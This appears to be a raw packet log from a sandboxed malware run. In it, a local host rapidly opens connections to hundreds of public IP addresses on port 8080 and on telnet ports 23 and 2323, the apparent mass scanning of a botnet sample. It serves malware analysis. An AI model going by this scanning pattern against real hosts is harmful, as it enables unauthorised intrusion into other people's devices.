                                                            Feb 14, 2024 09:27:43.011071920 CET406848080192.168.2.2394.42.163.219
                                                            Feb 14, 2024 09:27:43.011071920 CET406848080192.168.2.2362.141.10.213
                                                            Feb 14, 2024 09:27:43.011071920 CET406848080192.168.2.2395.197.170.94
                                                            Feb 14, 2024 09:27:43.011071920 CET406848080192.168.2.2331.29.5.86
                                                            Feb 14, 2024 09:27:43.011071920 CET406848080192.168.2.2394.120.218.57
                                                            Feb 14, 2024 09:27:43.011090994 CET406848080192.168.2.2331.157.230.141
                                                            Feb 14, 2024 09:27:43.011090994 CET406848080192.168.2.2385.101.116.174
                                                            Feb 14, 2024 09:27:43.011090994 CET406848080192.168.2.2331.25.74.111
                                                            Feb 14, 2024 09:27:43.011090994 CET406848080192.168.2.2331.79.95.97
                                                            Feb 14, 2024 09:27:43.011090994 CET406848080192.168.2.2395.165.99.253
                                                            Feb 14, 2024 09:27:43.011090994 CET406848080192.168.2.2362.8.170.19
                                                            Feb 14, 2024 09:27:43.011090994 CET406848080192.168.2.2395.198.142.158
                                                            Feb 14, 2024 09:27:43.011090994 CET406848080192.168.2.2362.22.32.15
                                                            Feb 14, 2024 09:27:43.011138916 CET406848080192.168.2.2362.147.201.128
                                                            Feb 14, 2024 09:27:43.011138916 CET406848080192.168.2.2394.32.114.53
                                                            Feb 14, 2024 09:27:43.011138916 CET406848080192.168.2.2331.41.11.251
                                                            Feb 14, 2024 09:27:43.011138916 CET406848080192.168.2.2394.213.241.60
                                                            Feb 14, 2024 09:27:43.011138916 CET406848080192.168.2.2395.75.142.226
                                                            Feb 14, 2024 09:27:43.011147976 CET406848080192.168.2.2395.185.62.51
                                                            Feb 14, 2024 09:27:43.011147976 CET406848080192.168.2.2385.121.123.173
                                                            Feb 14, 2024 09:27:43.011147976 CET406848080192.168.2.2362.218.83.181
                                                            Feb 14, 2024 09:27:43.011147976 CET406848080192.168.2.2394.165.43.177
                                                            Feb 14, 2024 09:27:43.011147976 CET406848080192.168.2.2394.87.165.196
                                                            Feb 14, 2024 09:27:43.011147976 CET406848080192.168.2.2395.65.70.83
                                                            Feb 14, 2024 09:27:43.011147976 CET406848080192.168.2.2395.91.138.121
                                                            Feb 14, 2024 09:27:43.011153936 CET406848080192.168.2.2394.31.65.116
                                                            Feb 14, 2024 09:27:43.011153936 CET406848080192.168.2.2394.102.206.83
                                                            Feb 14, 2024 09:27:43.011153936 CET406848080192.168.2.2395.129.94.37
                                                            Feb 14, 2024 09:27:43.011153936 CET406848080192.168.2.2362.101.236.120
                                                            Feb 14, 2024 09:27:43.011162996 CET406848080192.168.2.2394.38.1.162
                                                            Feb 14, 2024 09:27:43.011162996 CET406848080192.168.2.2362.111.29.10
                                                            Feb 14, 2024 09:27:43.011162996 CET406848080192.168.2.2395.67.151.154
                                                            Feb 14, 2024 09:27:43.011162996 CET406848080192.168.2.2331.16.131.66
                                                            Feb 14, 2024 09:27:43.011162996 CET406848080192.168.2.2331.233.164.77
                                                            Feb 14, 2024 09:27:43.011162996 CET406848080192.168.2.2331.136.47.252
                                                            Feb 14, 2024 09:27:43.011162996 CET406848080192.168.2.2394.11.184.164
                                                            Feb 14, 2024 09:27:43.011162996 CET406848080192.168.2.2395.39.173.128
                                                            Feb 14, 2024 09:27:43.011199951 CET575688080192.168.2.2385.122.216.165
                                                            Feb 14, 2024 09:27:43.011209011 CET406848080192.168.2.2394.229.15.20
                                                            Feb 14, 2024 09:27:43.011209011 CET406848080192.168.2.2395.27.12.214
                                                            Feb 14, 2024 09:27:43.011209011 CET406848080192.168.2.2362.61.96.13
                                                            Feb 14, 2024 09:27:43.011209011 CET406848080192.168.2.2394.129.141.197
                                                            Feb 14, 2024 09:27:43.011209011 CET406848080192.168.2.2331.53.230.163
                                                            Feb 14, 2024 09:27:43.011214972 CET406848080192.168.2.2394.76.226.245
                                                            Feb 14, 2024 09:27:43.011215925 CET406848080192.168.2.2385.26.228.101
                                                            Feb 14, 2024 09:27:43.011215925 CET406848080192.168.2.2385.211.80.23
                                                            Feb 14, 2024 09:27:43.011215925 CET406848080192.168.2.2331.237.40.130
                                                            Feb 14, 2024 09:27:43.011215925 CET406848080192.168.2.2385.80.151.245
                                                            Feb 14, 2024 09:27:43.011215925 CET406848080192.168.2.2331.78.81.188
                                                            Feb 14, 2024 09:27:43.011215925 CET406848080192.168.2.2385.87.235.130
                                                            Feb 14, 2024 09:27:43.011255026 CET376148080192.168.2.2385.114.158.134
                                                            Feb 14, 2024 09:27:43.011277914 CET362748080192.168.2.2394.224.122.253
                                                            Feb 14, 2024 09:27:43.011295080 CET536528080192.168.2.2394.120.18.189
                                                            Feb 14, 2024 09:27:43.011312962 CET464928080192.168.2.2395.86.71.100
                                                            Feb 14, 2024 09:27:43.011329889 CET460268080192.168.2.2362.20.81.106
                                                            Feb 14, 2024 09:27:43.085351944 CET4069523192.168.2.23189.242.242.212
                                                            Feb 14, 2024 09:27:43.085355997 CET406952323192.168.2.2361.174.89.47
                                                            Feb 14, 2024 09:27:43.085366011 CET4069523192.168.2.23101.53.252.187
                                                            Feb 14, 2024 09:27:43.085366964 CET4069523192.168.2.2373.233.197.242
                                                            Feb 14, 2024 09:27:43.085367918 CET4069523192.168.2.23161.147.254.20
                                                            Feb 14, 2024 09:27:43.085367918 CET4069523192.168.2.23131.3.145.68
                                                            Feb 14, 2024 09:27:43.085381031 CET406952323192.168.2.23146.215.73.158
                                                            Feb 14, 2024 09:27:43.085388899 CET4069523192.168.2.23151.18.239.210
                                                            Feb 14, 2024 09:27:43.085390091 CET4069523192.168.2.23119.245.27.18
                                                            Feb 14, 2024 09:27:43.085388899 CET4069523192.168.2.2394.75.76.153
                                                            Feb 14, 2024 09:27:43.085388899 CET4069523192.168.2.2377.133.169.187
                                                            Feb 14, 2024 09:27:43.085395098 CET4069523192.168.2.23182.37.220.13
                                                            Feb 14, 2024 09:27:43.085397005 CET4069523192.168.2.2380.82.230.159
                                                            Feb 14, 2024 09:27:43.085397959 CET4069523192.168.2.23177.116.179.244
                                                            Feb 14, 2024 09:27:43.085408926 CET4069523192.168.2.23176.41.115.160
                                                            Feb 14, 2024 09:27:43.085412979 CET4069523192.168.2.2363.73.167.192
                                                            Feb 14, 2024 09:27:43.085416079 CET4069523192.168.2.23187.143.45.121
                                                            Feb 14, 2024 09:27:43.085431099 CET4069523192.168.2.23112.205.243.220
                                                            Feb 14, 2024 09:27:43.085439920 CET4069523192.168.2.234.79.9.217
                                                            Feb 14, 2024 09:27:43.085441113 CET406952323192.168.2.23192.44.96.132
                                                            Feb 14, 2024 09:27:43.085455894 CET4069523192.168.2.2362.94.238.185
                                                            Feb 14, 2024 09:27:43.085458040 CET4069523192.168.2.23161.156.107.58
                                                            Feb 14, 2024 09:27:43.085460901 CET4069523192.168.2.2317.13.119.174
                                                            Feb 14, 2024 09:27:43.085467100 CET4069523192.168.2.2360.78.75.78
                                                            Feb 14, 2024 09:27:43.085465908 CET4069523192.168.2.2366.122.177.116
                                                            Feb 14, 2024 09:27:43.085467100 CET4069523192.168.2.23139.240.218.74
                                                            Feb 14, 2024 09:27:43.085473061 CET4069523192.168.2.23123.35.123.52
                                                            Feb 14, 2024 09:27:43.085479021 CET4069523192.168.2.23124.50.182.59
                                                            Feb 14, 2024 09:27:43.085480928 CET4069523192.168.2.2314.77.133.115
                                                            Feb 14, 2024 09:27:43.085484982 CET406952323192.168.2.2377.39.68.93
                                                            Feb 14, 2024 09:27:43.085484982 CET4069523192.168.2.23121.234.56.63
                                                            Feb 14, 2024 09:27:43.085486889 CET4069523192.168.2.23184.3.219.129
                                                            Feb 14, 2024 09:27:43.085494995 CET4069523192.168.2.23157.161.50.214
                                                            Feb 14, 2024 09:27:43.085494995 CET4069523192.168.2.2364.178.231.48
                                                            Feb 14, 2024 09:27:43.085504055 CET4069523192.168.2.2357.126.135.0
                                                            Feb 14, 2024 09:27:43.085516930 CET4069523192.168.2.2327.126.239.44
                                                            Feb 14, 2024 09:27:43.085516930 CET4069523192.168.2.23221.199.34.24
                                                            Feb 14, 2024 09:27:43.085527897 CET4069523192.168.2.23205.177.201.26
                                                            Feb 14, 2024 09:27:43.085530996 CET4069523192.168.2.23196.95.70.8
                                                            Feb 14, 2024 09:27:43.085545063 CET4069523192.168.2.2342.170.53.166
                                                            Feb 14, 2024 09:27:43.085547924 CET4069523192.168.2.2396.31.109.135
                                                            Feb 14, 2024 09:27:43.085549116 CET406952323192.168.2.2369.21.175.84
                                                            Feb 14, 2024 09:27:43.085562944 CET4069523192.168.2.2362.244.144.171
                                                            Feb 14, 2024 09:27:43.085562944 CET4069523192.168.2.2398.253.242.220
                                                            Feb 14, 2024 09:27:43.085567951 CET4069523192.168.2.23159.201.250.185
                                                            Feb 14, 2024 09:27:43.085571051 CET4069523192.168.2.2396.58.216.154
                                                            Feb 14, 2024 09:27:43.085581064 CET4069523192.168.2.23182.25.60.95
                                                            Feb 14, 2024 09:27:43.085587978 CET4069523192.168.2.2339.189.254.159
                                                            Feb 14, 2024 09:27:43.085592031 CET4069523192.168.2.2314.31.21.144
                                                            Feb 14, 2024 09:27:43.085597038 CET4069523192.168.2.23142.139.33.94
                                                            Feb 14, 2024 09:27:43.085597038 CET406952323192.168.2.2373.40.198.66
                                                            Feb 14, 2024 09:27:43.085611105 CET4069523192.168.2.23118.25.216.184
                                                            Feb 14, 2024 09:27:43.085613012 CET4069523192.168.2.2396.218.250.150
                                                            Feb 14, 2024 09:27:43.085629940 CET4069523192.168.2.2386.244.39.70
                                                            Feb 14, 2024 09:27:43.085630894 CET4069523192.168.2.23166.48.130.214
                                                            Feb 14, 2024 09:27:43.085640907 CET4069523192.168.2.23216.87.79.160
                                                            Feb 14, 2024 09:27:43.085644960 CET4069523192.168.2.2341.166.242.63
                                                            Feb 14, 2024 09:27:43.085649014 CET4069523192.168.2.2340.176.142.69
                                                            Feb 14, 2024 09:27:43.085649014 CET4069523192.168.2.23210.206.86.242
                                                            Feb 14, 2024 09:27:43.085660934 CET4069523192.168.2.231.116.146.163
                                                            Feb 14, 2024 09:27:43.085670948 CET406952323192.168.2.23142.242.101.196
                                                            Feb 14, 2024 09:27:43.085671902 CET4069523192.168.2.239.192.87.85
                                                            Feb 14, 2024 09:27:43.085675001 CET4069523192.168.2.23105.213.38.156
                                                            Feb 14, 2024 09:27:43.085680008 CET4069523192.168.2.23149.228.4.200
                                                            Feb 14, 2024 09:27:43.085685968 CET4069523192.168.2.2348.201.213.197
                                                            Feb 14, 2024 09:27:43.085705996 CET4069523192.168.2.2320.24.138.196
                                                            Feb 14, 2024 09:27:43.085706949 CET4069523192.168.2.2379.111.72.210
                                                            Feb 14, 2024 09:27:43.085711956 CET4069523192.168.2.23105.118.205.2
                                                            Feb 14, 2024 09:27:43.085721970 CET4069523192.168.2.23203.210.28.70
                                                            Feb 14, 2024 09:27:43.085721970 CET4069523192.168.2.23119.134.131.153
                                                            Feb 14, 2024 09:27:43.085732937 CET406952323192.168.2.23111.124.189.216
                                                            Feb 14, 2024 09:27:43.085737944 CET4069523192.168.2.23156.229.139.11
                                                            Feb 14, 2024 09:27:43.085738897 CET4069523192.168.2.2344.33.56.134
                                                            Feb 14, 2024 09:27:43.085740089 CET4069523192.168.2.2336.161.228.139
                                                            Feb 14, 2024 09:27:43.085745096 CET4069523192.168.2.2393.79.25.38
                                                            Feb 14, 2024 09:27:43.085760117 CET4069523192.168.2.23181.159.236.90
                                                            Feb 14, 2024 09:27:43.085760117 CET4069523192.168.2.2360.107.86.236
                                                            Feb 14, 2024 09:27:43.085764885 CET4069523192.168.2.2336.55.247.239
                                                            Feb 14, 2024 09:27:43.085768938 CET4069523192.168.2.23165.84.4.253
                                                            Feb 14, 2024 09:27:43.085774899 CET4069523192.168.2.23122.238.173.105
                                                            Feb 14, 2024 09:27:43.085774899 CET406952323192.168.2.23200.6.15.192
                                                            Feb 14, 2024 09:27:43.085779905 CET4069523192.168.2.23100.30.221.83
                                                            Feb 14, 2024 09:27:43.085791111 CET4069523192.168.2.23150.93.232.60
                                                            Feb 14, 2024 09:27:43.085800886 CET4069523192.168.2.2393.137.100.231
                                                            Feb 14, 2024 09:27:43.085803032 CET4069523192.168.2.2385.130.22.145
                                                            Feb 14, 2024 09:27:43.085807085 CET4069523192.168.2.23211.247.74.244
                                                            Feb 14, 2024 09:27:43.085815907 CET4069523192.168.2.23201.66.77.222
                                                            Feb 14, 2024 09:27:43.085824013 CET4069523192.168.2.2368.170.64.148
                                                            Feb 14, 2024 09:27:43.085836887 CET4069523192.168.2.23124.148.239.115
                                                            Feb 14, 2024 09:27:43.085838079 CET406952323192.168.2.2353.42.78.206
                                                            Feb 14, 2024 09:27:43.085839033 CET4069523192.168.2.2398.197.38.0
                                                            Feb 14, 2024 09:27:43.085846901 CET4069523192.168.2.23109.12.227.234
                                                            Feb 14, 2024 09:27:43.085850954 CET4069523192.168.2.23189.176.82.79
                                                            Feb 14, 2024 09:27:43.085861921 CET4069523192.168.2.2342.203.91.240
                                                            Feb 14, 2024 09:27:43.085872889 CET4069523192.168.2.2373.86.48.242
                                                            Feb 14, 2024 09:27:43.085872889 CET4069523192.168.2.23113.223.25.114
                                                            Feb 14, 2024 09:27:43.085877895 CET4069523192.168.2.2390.190.224.86
                                                            Feb 14, 2024 09:27:43.085892916 CET4069523192.168.2.2314.29.149.208
                                                            Feb 14, 2024 09:27:43.085892916 CET406952323192.168.2.23153.237.116.117
                                                            Feb 14, 2024 09:27:43.085896969 CET4069523192.168.2.23217.226.238.181
                                                            Feb 14, 2024 09:27:43.085896969 CET4069523192.168.2.2377.192.144.5
                                                            Feb 14, 2024 09:27:43.085896969 CET4069523192.168.2.23114.103.167.189
                                                            Feb 14, 2024 09:27:43.085905075 CET4069523192.168.2.2366.145.107.169
                                                            Feb 14, 2024 09:27:43.085911989 CET4069523192.168.2.23205.187.51.180
                                                            Feb 14, 2024 09:27:43.085917950 CET4069523192.168.2.2373.64.36.68
                                                            Feb 14, 2024 09:27:43.085920095 CET4069523192.168.2.23120.86.5.17
                                                            Feb 14, 2024 09:27:43.085931063 CET4069523192.168.2.23171.174.244.79
                                                            Feb 14, 2024 09:27:43.085932970 CET4069523192.168.2.23213.173.240.71
                                                            Feb 14, 2024 09:27:43.085939884 CET4069523192.168.2.2318.218.146.237
                                                            Feb 14, 2024 09:27:43.085951090 CET4069523192.168.2.23177.21.221.206
                                                            Feb 14, 2024 09:27:43.085951090 CET406952323192.168.2.23147.69.237.117
                                                            Feb 14, 2024 09:27:43.085952997 CET4069523192.168.2.23180.244.44.122
                                                            Feb 14, 2024 09:27:43.085958958 CET4069523192.168.2.2347.176.135.229
                                                            Feb 14, 2024 09:27:43.085962057 CET4069523192.168.2.23172.141.35.53
                                                            Feb 14, 2024 09:27:43.085962057 CET4069523192.168.2.2323.40.92.181
                                                            Feb 14, 2024 09:27:43.085962057 CET4069523192.168.2.2334.158.174.40
                                                            Feb 14, 2024 09:27:43.085979939 CET4069523192.168.2.23100.143.99.37
                                                            Feb 14, 2024 09:27:43.085983992 CET4069523192.168.2.23206.216.9.11
                                                            Feb 14, 2024 09:27:43.085989952 CET4069523192.168.2.23120.8.125.24
                                                            Feb 14, 2024 09:27:43.085993052 CET406952323192.168.2.2398.18.226.153
                                                            Feb 14, 2024 09:27:43.085994005 CET4069523192.168.2.232.84.201.199
                                                            Feb 14, 2024 09:27:43.085999966 CET4069523192.168.2.2331.80.119.242
                                                            Feb 14, 2024 09:27:43.086000919 CET4069523192.168.2.23190.127.191.217
                                                            Feb 14, 2024 09:27:43.086003065 CET4069523192.168.2.2320.16.226.117
                                                            Feb 14, 2024 09:27:43.086013079 CET4069523192.168.2.23211.145.106.147
                                                            Feb 14, 2024 09:27:43.086013079 CET4069523192.168.2.23177.165.11.33
                                                            Feb 14, 2024 09:27:43.086020947 CET4069523192.168.2.23160.122.26.94
                                                            Feb 14, 2024 09:27:43.086021900 CET4069523192.168.2.23223.86.52.122
                                                            Feb 14, 2024 09:27:43.086030006 CET4069523192.168.2.23139.158.248.167
                                                            Feb 14, 2024 09:27:43.086030006 CET4069523192.168.2.23190.255.114.48
                                                            Feb 14, 2024 09:27:43.086034060 CET406952323192.168.2.23187.82.187.64
                                                            Feb 14, 2024 09:27:43.086051941 CET4069523192.168.2.23156.197.47.28
                                                            Feb 14, 2024 09:27:43.086051941 CET4069523192.168.2.2343.189.44.1
                                                            Feb 14, 2024 09:27:43.086051941 CET4069523192.168.2.23199.36.89.226
                                                            Feb 14, 2024 09:27:43.086057901 CET4069523192.168.2.2380.134.104.221
                                                            Feb 14, 2024 09:27:43.086066961 CET4069523192.168.2.2353.156.215.182
                                                            Feb 14, 2024 09:27:43.086072922 CET4069523192.168.2.23219.19.164.219
                                                            Feb 14, 2024 09:27:43.086078882 CET4069523192.168.2.23212.252.251.83
                                                            Feb 14, 2024 09:27:43.086078882 CET4069523192.168.2.2378.20.27.208
                                                            Feb 14, 2024 09:27:43.086086988 CET4069523192.168.2.23119.172.132.58
                                                            Feb 14, 2024 09:27:43.086088896 CET406952323192.168.2.2352.125.18.206
                                                            Feb 14, 2024 09:27:43.086098909 CET4069523192.168.2.2367.82.63.200
                                                            Feb 14, 2024 09:27:43.086102009 CET4069523192.168.2.2382.44.228.139
                                                            Feb 14, 2024 09:27:43.086107969 CET4069523192.168.2.23152.137.212.164
                                                            Feb 14, 2024 09:27:43.086112022 CET4069523192.168.2.2378.217.61.250
                                                            Feb 14, 2024 09:27:43.086112022 CET4069523192.168.2.2335.67.71.157
                                                            Feb 14, 2024 09:27:43.086114883 CET4069523192.168.2.2325.83.109.91
                                                            Feb 14, 2024 09:27:43.086117029 CET4069523192.168.2.23161.182.106.144
                                                            Feb 14, 2024 09:27:43.086129904 CET4069523192.168.2.23162.13.63.158
                                                            Feb 14, 2024 09:27:43.086134911 CET4069523192.168.2.2341.174.181.241
                                                            Feb 14, 2024 09:27:43.086143970 CET406952323192.168.2.2364.44.184.227
                                                            Feb 14, 2024 09:27:43.086144924 CET4069523192.168.2.23168.52.136.245
                                                            Feb 14, 2024 09:27:43.086152077 CET4069523192.168.2.2387.203.128.49
                                                            Feb 14, 2024 09:27:43.086154938 CET4069523192.168.2.23193.182.58.172
                                                            Feb 14, 2024 09:27:43.086162090 CET4069523192.168.2.2378.77.182.55
                                                            Feb 14, 2024 09:27:43.086164951 CET4069523192.168.2.23100.24.135.73
                                                            Feb 14, 2024 09:27:43.086172104 CET4069523192.168.2.2363.124.54.109
                                                            Feb 14, 2024 09:27:43.086175919 CET4069523192.168.2.23191.221.206.189
                                                            Feb 14, 2024 09:27:43.086184978 CET4069523192.168.2.23145.7.23.230
                                                            Feb 14, 2024 09:27:43.086194992 CET4069523192.168.2.23181.156.73.34
                                                            Feb 14, 2024 09:27:43.086205006 CET406952323192.168.2.23196.206.51.231
                                                            Feb 14, 2024 09:27:43.086205006 CET4069523192.168.2.2397.8.53.92
                                                            Feb 14, 2024 09:27:43.086206913 CET4069523192.168.2.2345.199.230.33
                                                            Feb 14, 2024 09:27:43.086222887 CET4069523192.168.2.23163.1.41.177
                                                            Feb 14, 2024 09:27:43.086227894 CET4069523192.168.2.23179.91.97.87
                                                            Feb 14, 2024 09:27:43.086232901 CET4069523192.168.2.2368.167.247.75
                                                            Feb 14, 2024 09:27:43.086232901 CET4069523192.168.2.2375.130.131.94
                                                            Feb 14, 2024 09:27:43.086232901 CET4069523192.168.2.23210.220.95.78
                                                            Feb 14, 2024 09:27:43.086236000 CET4069523192.168.2.2313.168.161.123
                                                            Feb 14, 2024 09:27:43.086240053 CET4069523192.168.2.23132.241.145.107
                                                            Feb 14, 2024 09:27:43.086250067 CET406952323192.168.2.23177.253.37.92
                                                            Feb 14, 2024 09:27:43.086258888 CET4069523192.168.2.23100.143.104.119
                                                            Feb 14, 2024 09:27:43.086261988 CET4069523192.168.2.23141.9.133.93
                                                            Feb 14, 2024 09:27:43.086263895 CET4069523192.168.2.23213.160.165.68
                                                            Feb 14, 2024 09:27:43.086272001 CET4069523192.168.2.23138.179.106.144
                                                            Feb 14, 2024 09:27:43.086273909 CET4069523192.168.2.23113.60.31.82
                                                            Feb 14, 2024 09:27:43.086273909 CET4069523192.168.2.235.239.176.110
                                                            Feb 14, 2024 09:27:43.086280107 CET4069523192.168.2.2346.153.226.51
                                                            Feb 14, 2024 09:27:43.086286068 CET4069523192.168.2.23121.2.7.195
                                                            Feb 14, 2024 09:27:43.086288929 CET4069523192.168.2.23187.78.159.210
                                                            Feb 14, 2024 09:27:43.086297989 CET406952323192.168.2.2372.2.11.51
                                                            Feb 14, 2024 09:27:43.086303949 CET4069523192.168.2.23176.228.242.247
                                                            Feb 14, 2024 09:27:43.086306095 CET4069523192.168.2.23100.148.165.114
                                                            Feb 14, 2024 09:27:43.086306095 CET4069523192.168.2.2313.238.176.204
                                                            Feb 14, 2024 09:27:43.086312056 CET4069523192.168.2.2332.83.127.53
                                                            Feb 14, 2024 09:27:43.086312056 CET4069523192.168.2.23108.221.184.174
                                                            Feb 14, 2024 09:27:43.086324930 CET4069523192.168.2.23129.114.25.115
                                                            Feb 14, 2024 09:27:43.086334944 CET4069523192.168.2.23176.21.82.98
                                                            Feb 14, 2024 09:27:43.086338043 CET4069523192.168.2.23181.24.19.165
                                                            Feb 14, 2024 09:27:43.086347103 CET406952323192.168.2.23131.224.187.217
                                                            Feb 14, 2024 09:27:43.086348057 CET4069523192.168.2.235.74.148.209
                                                            Feb 14, 2024 09:27:43.086353064 CET4069523192.168.2.23205.244.138.48
                                                            Feb 14, 2024 09:27:43.086354017 CET4069523192.168.2.23133.98.135.186
                                                            Feb 14, 2024 09:27:43.086360931 CET4069523192.168.2.2381.109.198.35
                                                            Feb 14, 2024 09:27:43.086368084 CET4069523192.168.2.2353.81.58.180
                                                            Feb 14, 2024 09:27:43.086369038 CET4069523192.168.2.23185.43.98.2
                                                            Feb 14, 2024 09:27:43.086369038 CET4069523192.168.2.2336.203.53.64
                                                            Feb 14, 2024 09:27:43.086374044 CET4069523192.168.2.2347.196.13.117
                                                            Feb 14, 2024 09:27:43.086374998 CET4069523192.168.2.23120.126.230.119
                                                            Feb 14, 2024 09:27:43.086380005 CET4069523192.168.2.23118.48.207.188
                                                            Feb 14, 2024 09:27:43.086380959 CET4069523192.168.2.2320.30.135.138
                                                            Feb 14, 2024 09:27:43.086380959 CET4069523192.168.2.23131.122.23.20
                                                            Feb 14, 2024 09:27:43.086386919 CET4069523192.168.2.23195.157.188.152
                                                            Feb 14, 2024 09:27:43.086388111 CET4069523192.168.2.23156.4.145.217
                                                            Feb 14, 2024 09:27:43.086389065 CET406952323192.168.2.23220.74.147.112
                                                            Feb 14, 2024 09:27:43.086389065 CET4069523192.168.2.23148.124.52.250
                                                            Feb 14, 2024 09:27:43.086394072 CET4069523192.168.2.2338.65.170.48
                                                            Feb 14, 2024 09:27:43.086407900 CET4069523192.168.2.23187.184.14.43
                                                            Feb 14, 2024 09:27:43.086407900 CET4069523192.168.2.2342.152.62.245
                                                            Feb 14, 2024 09:27:43.086412907 CET406952323192.168.2.2348.115.197.53
                                                            Feb 14, 2024 09:27:43.086416006 CET4069523192.168.2.23130.111.98.40
                                                            Feb 14, 2024 09:27:43.086417913 CET4069523192.168.2.238.246.186.6
                                                            Feb 14, 2024 09:27:43.086425066 CET4069523192.168.2.23211.198.5.58
                                                            Feb 14, 2024 09:27:43.086436987 CET4069523192.168.2.2350.229.203.121
                                                            Feb 14, 2024 09:27:43.086437941 CET4069523192.168.2.23170.7.26.49
                                                            Feb 14, 2024 09:27:43.086437941 CET4069523192.168.2.2347.125.118.149
                                                            Feb 14, 2024 09:27:43.086441040 CET4069523192.168.2.23148.175.223.66
                                                            Feb 14, 2024 09:27:43.086457014 CET4069523192.168.2.2353.193.151.216
                                                            Feb 14, 2024 09:27:43.086457014 CET4069523192.168.2.23112.255.180.171
                                                            Feb 14, 2024 09:27:43.086474895 CET4069523192.168.2.23196.253.102.218
                                                            Feb 14, 2024 09:27:43.086474895 CET406952323192.168.2.23201.21.35.128
                                                            Feb 14, 2024 09:27:43.086479902 CET4069523192.168.2.23124.109.35.149
                                                            Feb 14, 2024 09:27:43.086484909 CET4069523192.168.2.23188.185.146.125
                                                            Feb 14, 2024 09:27:43.086484909 CET4069523192.168.2.23149.134.149.193
                                                            Feb 14, 2024 09:27:43.086484909 CET4069523192.168.2.23174.3.232.45
                                                            Feb 14, 2024 09:27:43.086488008 CET4069523192.168.2.23213.54.169.24
                                                            Feb 14, 2024 09:27:43.086493969 CET4069523192.168.2.23210.221.69.224
                                                            Feb 14, 2024 09:27:43.086498022 CET4069523192.168.2.2342.18.111.73
                                                            Feb 14, 2024 09:27:43.086498022 CET4069523192.168.2.23114.198.191.16
                                                            Feb 14, 2024 09:27:43.086498976 CET4069523192.168.2.2340.115.139.95
                                                            Feb 14, 2024 09:27:43.086509943 CET406952323192.168.2.2385.236.194.19
                                                            Feb 14, 2024 09:27:43.086513042 CET4069523192.168.2.2342.123.157.98
                                                            Feb 14, 2024 09:27:43.086514950 CET4069523192.168.2.23198.143.192.215
                                                            Feb 14, 2024 09:27:43.086520910 CET4069523192.168.2.23181.212.227.242
                                                            Feb 14, 2024 09:27:43.086520910 CET4069523192.168.2.23142.131.166.252
                                                            Feb 14, 2024 09:27:43.086522102 CET4069523192.168.2.2366.36.233.65
                                                            Feb 14, 2024 09:27:43.086524963 CET4069523192.168.2.23141.58.233.71
                                                            Feb 14, 2024 09:27:43.086524963 CET4069523192.168.2.23106.254.203.165
                                                            Feb 14, 2024 09:27:43.086525917 CET4069523192.168.2.23189.228.171.178
                                                            Feb 14, 2024 09:27:43.086529970 CET4069523192.168.2.23122.176.165.232
                                                            Feb 14, 2024 09:27:43.086544037 CET406952323192.168.2.2346.86.193.125
                                                            Feb 14, 2024 09:27:43.086544037 CET4069523192.168.2.23192.175.94.98
                                                            Feb 14, 2024 09:27:43.086545944 CET4069523192.168.2.2331.225.73.147
                                                            Feb 14, 2024 09:27:43.086549044 CET4069523192.168.2.2367.30.4.189
                                                            Feb 14, 2024 09:27:43.086558104 CET4069523192.168.2.23118.197.138.91
                                                            Feb 14, 2024 09:27:43.086565971 CET4069523192.168.2.23141.73.122.66
                                                            Feb 14, 2024 09:27:43.086568117 CET4069523192.168.2.2389.239.205.224
                                                            Feb 14, 2024 09:27:43.086575985 CET4069523192.168.2.2398.220.183.191
                                                            Feb 14, 2024 09:27:43.086575985 CET4069523192.168.2.2352.45.128.7
                                                            Feb 14, 2024 09:27:43.086580038 CET4069523192.168.2.23221.183.78.168
                                                            Feb 14, 2024 09:27:43.086594105 CET406952323192.168.2.23165.64.53.185
                                                            Feb 14, 2024 09:27:43.086595058 CET4069523192.168.2.23116.176.101.163
                                                            Feb 14, 2024 09:27:43.086606026 CET4069523192.168.2.23133.247.67.231
                                                            Feb 14, 2024 09:27:43.086606979 CET4069523192.168.2.232.21.30.10
                                                            Feb 14, 2024 09:27:43.086606979 CET4069523192.168.2.23110.54.248.46
                                                            Feb 14, 2024 09:27:43.086607933 CET4069523192.168.2.2350.216.220.120
                                                            Feb 14, 2024 09:27:43.086612940 CET4069523192.168.2.23179.162.38.191
                                                            Feb 14, 2024 09:27:43.086622953 CET4069523192.168.2.2371.85.146.138
                                                            Feb 14, 2024 09:27:43.086635113 CET4069523192.168.2.23146.49.206.106
                                                            Feb 14, 2024 09:27:43.086641073 CET4069523192.168.2.23200.73.68.124
                                                            Feb 14, 2024 09:27:43.086649895 CET4069523192.168.2.2324.246.228.36
                                                            Feb 14, 2024 09:27:43.086651087 CET4069523192.168.2.23143.170.85.240
                                                            Feb 14, 2024 09:27:43.086652994 CET406952323192.168.2.2367.122.19.62
                                                            Feb 14, 2024 09:27:43.086662054 CET4069523192.168.2.2331.49.155.14
                                                            Feb 14, 2024 09:27:43.086668968 CET4069523192.168.2.23183.147.51.142
                                                            Feb 14, 2024 09:27:43.086668968 CET4069523192.168.2.2332.209.210.159
                                                            Feb 14, 2024 09:27:43.086685896 CET4069523192.168.2.2327.160.77.148
                                                            Feb 14, 2024 09:27:43.086685896 CET4069523192.168.2.23144.133.234.74
                                                            Feb 14, 2024 09:27:43.086685896 CET4069523192.168.2.2374.95.62.117
                                                            Feb 14, 2024 09:27:43.086688042 CET4069523192.168.2.2386.191.169.9
                                                            Feb 14, 2024 09:27:43.086702108 CET406952323192.168.2.2395.31.63.209
                                                            Feb 14, 2024 09:27:43.086702108 CET4069523192.168.2.23126.137.49.72
                                                            Feb 14, 2024 09:27:43.086709976 CET4069523192.168.2.23156.16.94.16
                                                            Feb 14, 2024 09:27:43.086720943 CET4069523192.168.2.23110.219.209.166
                                                            Feb 14, 2024 09:27:43.086725950 CET4069523192.168.2.23123.189.85.139
                                                            Feb 14, 2024 09:27:43.086728096 CET4069523192.168.2.23163.91.89.238
                                                            Feb 14, 2024 09:27:43.086728096 CET4069523192.168.2.23185.212.148.95
                                                            Feb 14, 2024 09:27:43.086734056 CET4069523192.168.2.2389.233.228.167
                                                            Feb 14, 2024 09:27:43.086744070 CET4069523192.168.2.2366.232.41.43
                                                            Feb 14, 2024 09:27:43.086745024 CET4069523192.168.2.2374.118.33.37
                                                            Feb 14, 2024 09:27:43.086752892 CET406952323192.168.2.2364.177.19.51
                                                            Feb 14, 2024 09:27:43.086766958 CET4069523192.168.2.23102.151.37.141
                                                            Feb 14, 2024 09:27:43.086771965 CET4069523192.168.2.23126.239.237.78
                                                            Feb 14, 2024 09:27:43.086779118 CET4069523192.168.2.23188.245.142.86
                                                            Feb 14, 2024 09:27:43.086786032 CET4069523192.168.2.23212.160.85.56
                                                            Feb 14, 2024 09:27:43.086791039 CET4069523192.168.2.2377.170.105.141
